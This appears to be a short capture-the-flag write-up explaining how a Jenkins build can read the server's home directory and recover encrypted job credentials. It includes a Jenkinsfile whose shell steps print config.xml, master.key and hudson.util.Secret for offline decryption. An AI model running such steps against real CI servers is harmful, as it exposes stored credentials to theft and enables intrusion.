blob: 2ebfbe08c0b8191b34d4033751a61d1bf9935a8d (
plain)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
|
Jenkins doesn't provide any sort of sandboxing, but it tells you your build runs in `/var/jenkins_home/jobs/...`.
You can modify the `Jenkinsfile` to enumerate `/var/jenkins_home`, using `find` or whatever else.
From this we're able to read all the config files, including the one for secure jobs in `/var/jenkins_home/jobs/secure-jobs/config.xml`.
The credentials in here are encrypted, but since we're able to read everything Jenkins can, we can find the key. I found [this](https://github.com/hoto/jenkins-credentials-decryptor) tool to do so.
This `Jenkinsfile` gets everything we need for decryption.
```
pipeline {
agent any
stages {
stage('build') {
steps {
sh 'cat /var/jenkins_home/jobs/secure-jobs/config.xml'
sh 'cat /var/jenkins_home/secrets/master.key'
sh 'cat /var/jenkins_home/secrets/hudson.util.Secret | base64'
}
}
}
}
```
Then we simply feed everything into the decryptor to get `punk_{GBI3BZOA3E8USYUH}`.
|
